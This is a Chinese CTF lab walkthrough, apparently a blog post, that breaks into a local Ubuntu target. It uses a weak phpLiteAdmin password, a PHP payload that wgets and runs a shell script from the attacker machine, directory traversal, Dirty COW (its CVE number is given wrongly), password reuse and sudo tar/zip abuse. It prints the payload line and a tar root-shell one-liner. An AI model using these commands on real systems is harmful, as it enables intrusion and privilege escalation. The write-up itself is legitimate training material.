CTF靶场-目录遍历getshell+内核溢出提权/密码复用提权

实验环境

攻击者:Kali Linux(192.168.0.19)
靶机:Oracle VM VirtualBox 6.1.10——Ubuntu(64-bit)(192.168.0.249)

实验流程

  • 端口扫描
    在这里插入图片描述
  • 目录扫描
    其中/dbadmin/疑似网站数据库后台管理页面
    在这里插入图片描述
  • 访问url:http://192.168.0.249/dbadmin
    在这里插入图片描述在这里插入图片描述
  • 弱口令:admin
    在这里插入图片描述
  • 该web程序为phpliteadmin v1.9.3,存在远程代码执行漏洞,没有溢出代码,但是有一个利用文档中包含了对于该web应用程序getshell的流程,其中上传的PHP脚本文件需要进行访问才能生效。
    在这里插入图片描述在这里插入图片描述
  • 漏洞探测
    通过对该网站进行漏洞扫描发现该网站存在目录遍历漏洞
    在这里插入图片描述
  • 目录遍历漏洞验证
    在这里插入图片描述
  • 结合phpliteadmin的代码执行漏洞和目录遍历漏洞getshell
    输入数据库名称,点击create创建数据库——hack.php
    在这里插入图片描述点击新创建的数据库,输入数据表名称和数据表中的字段数量,点击go,创建数据表
    在这里插入图片描述输入字段名、字段类型,点击create创建字段,注意字段类型选择text。
    在这里插入图片描述准备好要上传到服务器上面的文件
    在这里插入图片描述
    利用python创建HTTP服务,将root用户的家目录作为网站的根目录
    在这里插入图片描述
    点击新创建的数据库,选中新创建的数据表,点击insert插入数据。<?php system("wget http://192.168.0.19:8000/shell.php -O /tmp/shell.php; chmod +x /tmp/shell.php; php /tmp/shell.php;"); ?>
    在这里插入图片描述
    攻击机监听端口
    在这里插入图片描述利用目录遍历漏洞访问该文件反弹shell:http://192.168.0.249/view.php?page=…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/usr/databases/hack.php
    在这里插入图片描述
  • 获取当前权限:www-data是Linux操作系统中运行web服务的默认用户(权限较低)
    在这里插入图片描述
  • 获取操作系统内发行版本(Ubuntu 12.04.5 LTS)和内核版本(3.2.0-23-generic)
    在这里插入图片描述
    判断是否存在代码溢出漏洞,有溢出代码
    在这里插入图片描述
  • 利用脏牛提权(cve-2016-5159)
    将提权文件上传到靶机
    溢出代码下地址:https://github.com/FireFart/dirtycow
    在这里插入图片描述
    在这里插入图片描述访问对应的数据库文件
    在这里插入图片描述在这里插入图片描述
    优化shell
    在这里插入图片描述
    编译并执行溢出代码
    在这里插入图片描述
    赋予执行权限
    在这里插入图片描述
    执行溢出代码
    在这里插入图片描述
    切换用户
    在这里插入图片描述
  • 获取flag
    在这里插入图片描述
  • 利用密码复用进行提权
    因为需要涉及到切换用户的问题同样需要利用python优化shell
    利用获取到的低权限用户在系统中搜寻敏感信息,寻找一些可能存储了密码的敏感文件或者网站的配置文件等,一定要查看系统用户的家目录。
    在这里插入图片描述
    通过查看网站的配置文件拿到数据库用户zico的登录密码
    在这里插入图片描述
    尝试使用该密码切换到zico用户,成功
    在这里插入图片描述
    查看当前用户权限,普通系统用户。
    在这里插入图片描述
    查看当前用户使用sudo命令时的权限
    当前用户在使用tar命令和zip命令时拥有root用户的权限,并且不需要验证密码
    在这里插入图片描述
    利用zip提权
    首先创建一个空文件
    在这里插入图片描述
    提权成功
    在这里插入图片描述
    同样可以利用tar命令进行提权
    sudo -u root tar cf /dev/null exp -checkpoint=1 --checkpoint-action="/bin/bash"
  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值